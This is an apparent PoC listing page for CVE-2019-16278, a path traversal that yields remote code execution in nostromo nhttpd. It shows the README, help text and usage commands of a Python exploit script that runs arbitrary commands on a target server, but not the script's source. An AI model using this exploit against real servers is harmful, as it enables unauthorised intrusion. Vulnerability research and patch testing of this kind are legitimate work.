CVE-2019-16278 PoC — nostromo nhttpd Path Traversal Vulnerability

Source
Associated Vulnerability
Title: nostromo nhttpd Path Traversal Vulnerability (CVE-2019-16278)
Description: Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.
Description
Python script to exploit RCE in Nostromo nhttpd <= 1.9.6.
Readme
# CVE-2019-16278 - Nostromo 1.9.6 RCE
Python script to exploit RCE in Nostromo nhttpd <= 1.9.6.


## Help
```
usage: CVE-2019-16278.py [-h] [-t TARGET] [-p PORT] [-c COMMAND] [-b BYTES]

Exploit for CVE-2019-16278 - Nostromo 1.9.6 RCE

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Remote host to target
  -p PORT, --port PORT  Remote port to target
  -c COMMAND, --command COMMAND
                        Command to execute on the server
  -b BYTES, --bytes BYTES
                        The number of bytes to receive back in the response
```

## Usage

Run the exploit

```bash
python CVE-2019-16278.py -t 10.10.10.10 -p 80 -c whoami
```

Run the exploit and receive more bytes in the response

```bash
python CVE-2019-16278.py -t 10.10.10.10 -p 80 -c whoami -b 4096
```

File Snapshot

[4.0K] /data/pocs/5504050db6a1f89b3f124fd8c747155acd3d26fd
├── [1.1K] CVE-2019-16278.py
└── [ 863] README.md

0 directories, 2 files